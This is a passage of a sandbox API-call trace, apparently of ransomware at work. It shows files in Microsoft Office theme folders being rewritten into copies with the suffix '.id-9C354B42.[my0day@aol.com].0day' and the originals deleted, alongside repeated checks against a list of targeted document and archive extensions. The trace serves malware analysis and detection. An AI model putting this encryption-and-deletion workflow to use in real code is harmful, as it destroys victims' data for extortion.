lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.017] WriteFile (in: hFile=0x178, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.017] SetEndOfFile (hFile=0x178) returned 1 [0046.017] CloseHandle (hObject=0x178) returned 1 [0046.017] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.017] SetEndOfFile (hFile=0x198) returned 1 [0046.018] CloseHandle (hObject=0x198) returned 1 [0046.018] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.018] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif")) returned 1 [0046.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0046.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0046.018] lstrlenW (lpString=".doc") returned 4 [0046.018] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.019] lstrlenW (lpString=".docx") returned 5 [0046.019] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.019] lstrlenW (lpString=".pdf") returned 4 [0046.019] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.019] lstrlenW (lpString=".xls") returned 4 [0046.019] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.019] lstrlenW (lpString=".xlsx") returned 5 [0046.019] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.019] lstrlenW (lpString=".ppt") returned 4 [0046.019] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0046.019] lstrlenW (lpString=".zip") returned 4 [0046.019] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.019] lstrlenW (lpString=".rar") returned 4 [0046.019] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.019] lstrlenW (lpString=".bz2") returned 4 [0046.019] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.019] lstrlenW (lpString=".7z") returned 3 [0046.019] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0046.019] lstrlenW (lpString=".dbf") returned 4 [0046.019] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0046.019] lstrlenW (lpString=".1cd") returned 4 [0046.019] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0046.019] lstrlenW (lpString=".jpg") returned 4 [0046.019] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.020] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=48115) returned 1 [0046.020] CloseHandle (hObject=0x198) returned 1 [0046.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png")) returned 0x20 [0046.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.020] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.020] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0046.020] GetLastError () returned 0x0 [0046.020] ReadFile (in: hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0xbbf3, lpOverlapped=0x0) returned 1 [0046.132] WriteFile (in: hFile=0x178, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xbc00, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xbc00, lpOverlapped=0x0) returned 1 [0046.133] ReadFile (in: hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.133] WriteFile (in: hFile=0x178, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.133] SetEndOfFile (hFile=0x178) returned 1 [0046.133] CloseHandle (hObject=0x178) returned 1 [0046.133] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.133] SetEndOfFile (hFile=0x198) returned 1 [0046.134] CloseHandle (hObject=0x198) returned 1 [0046.134] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.135] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png")) returned 1 [0046.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0046.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0046.135] lstrlenW (lpString=".doc") returned 4 [0046.135] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.135] lstrlenW (lpString=".docx") returned 5 [0046.135] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.135] lstrlenW (lpString=".pdf") returned 4 [0046.135] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.135] lstrlenW (lpString=".xls") returned 4 [0046.135] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.135] lstrlenW (lpString=".xlsx") returned 5 [0046.135] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.135] lstrlenW (lpString=".ppt") returned 4 [0046.135] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0046.135] lstrlenW (lpString=".zip") returned 4 [0046.135] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.135] lstrlenW (lpString=".rar") returned 4 [0046.135] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.135] lstrlenW (lpString=".bz2") returned 4 [0046.135] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.135] lstrlenW (lpString=".7z") returned 3 [0046.135] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0046.135] lstrlenW (lpString=".dbf") returned 4 [0046.135] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0046.136] lstrlenW (lpString=".1cd") returned 4 [0046.136] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0046.136] lstrlenW (lpString=".jpg") returned 4 [0046.136] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.452] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=11573) returned 1 [0046.454] CloseHandle (hObject=0x194) returned 1 [0046.454] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png")) returned 0x20 [0046.461] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.461] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.461] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.461] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.468] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0046.468] GetLastError () returned 0x0 [0046.468] ReadFile (in: hFile=0x194, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x2d35, lpOverlapped=0x0) returned 1 [0046.486] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x2d40, lpOverlapped=0x0) returned 1 [0046.487] ReadFile (in: hFile=0x194, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.487] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.487] SetEndOfFile (hFile=0x208) returned 1 [0046.487] CloseHandle (hObject=0x208) returned 1 [0046.487] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.488] SetEndOfFile (hFile=0x194) returned 1 [0046.488] CloseHandle (hObject=0x194) returned 1 [0046.488] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.489] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png")) returned 1 [0046.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0046.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0046.489] lstrlenW (lpString=".doc") returned 4 [0046.489] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.489] lstrlenW (lpString=".docx") returned 5 [0046.489] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.489] lstrlenW (lpString=".pdf") returned 4 [0046.489] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.489] lstrlenW (lpString=".xls") returned 4 [0046.489] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.489] lstrlenW (lpString=".xlsx") returned 5 [0046.489] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.489] lstrlenW (lpString=".ppt") returned 4 [0046.489] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0046.489] lstrlenW (lpString=".zip") returned 4 [0046.489] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.489] lstrlenW (lpString=".rar") returned 4 [0046.489] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.489] lstrlenW (lpString=".bz2") returned 4 [0046.489] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.489] lstrlenW (lpString=".7z") returned 3 [0046.489] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0046.489] lstrlenW (lpString=".dbf") returned 4 [0046.489] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0046.490] lstrlenW (lpString=".1cd") returned 4 [0046.490] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0046.490] lstrlenW (lpString=".jpg") returned 4 [0046.490] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.377] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=53115) returned 1 [0047.377] CloseHandle (hObject=0x174) returned 1 [0047.377] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png")) returned 0x20 [0047.377] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.377] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0047.378] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.378] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.378] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.378] GetLastError () returned 0x0 [0047.378] ReadFile (in: hFile=0x174, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0xcf7b, lpOverlapped=0x0) returned 1 [0047.408] WriteFile (in: hFile=0x210, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xcf80, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xcf80, lpOverlapped=0x0) returned 1 [0047.410] ReadFile (in: hFile=0x174, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.410] WriteFile (in: hFile=0x210, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.410] SetEndOfFile (hFile=0x210) returned 1 [0047.410] CloseHandle (hObject=0x210) returned 1 [0047.411] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.411] SetEndOfFile (hFile=0x174) returned 1 [0047.412] CloseHandle (hObject=0x174) returned 1 [0047.412] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.412] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png")) returned 1 [0047.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.412] lstrlenW (lpString=".doc") returned 4 [0047.412] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.412] lstrlenW (lpString=".docx") returned 5 [0047.412] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.412] lstrlenW (lpString=".pdf") returned 4 [0047.412] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.412] lstrlenW (lpString=".xls") returned 4 [0047.412] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.412] lstrlenW (lpString=".xlsx") returned 5 [0047.412] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.412] lstrlenW (lpString=".ppt") returned 4 [0047.413] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.413] lstrlenW (lpString=".zip") returned 4 [0047.413] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.413] lstrlenW (lpString=".rar") returned 4 [0047.413] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.413] lstrlenW (lpString=".bz2") returned 4 [0047.413] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.413] lstrlenW (lpString=".7z") returned 3 [0047.413] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.413] lstrlenW (lpString=".dbf") returned 4 [0047.413] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.413] lstrlenW (lpString=".1cd") returned 4 [0047.413] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.413] lstrlenW (lpString=".jpg") returned 4 [0047.413] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.425] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=19525) returned 1 [0047.428] CloseHandle (hObject=0x210) returned 1 [0047.435] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png")) returned 0x20 [0047.435] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.435] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.435] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.448] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.448] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0047.449] GetLastError () returned 0x0 [0047.449] ReadFile (in: hFile=0x210, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x4c45, lpOverlapped=0x0) returned 1 [0047.455] WriteFile (in: hFile=0x1a8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x4c50, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x4c50, lpOverlapped=0x0) returned 1 [0047.456] ReadFile (in: hFile=0x210, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.457] WriteFile (in: hFile=0x1a8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.457] SetEndOfFile (hFile=0x1a8) returned 1 [0047.457] CloseHandle (hObject=0x1a8) returned 1 [0047.457] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.457] SetEndOfFile (hFile=0x210) returned 1 [0047.458] CloseHandle (hObject=0x210) returned 1 [0047.458] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.458] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png")) returned 1 [0047.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0047.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0047.458] lstrlenW (lpString=".doc") returned 4 [0047.458] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.458] lstrlenW (lpString=".docx") returned 5 [0047.458] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.458] lstrlenW (lpString=".pdf") returned 4 [0047.458] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.458] lstrlenW (lpString=".xls") returned 4 [0047.458] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.458] lstrlenW (lpString=".xlsx") returned 5 [0047.458] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.459] lstrlenW (lpString=".ppt") returned 4 [0047.459] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0047.459] lstrlenW (lpString=".zip") returned 4 [0047.459] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.459] lstrlenW 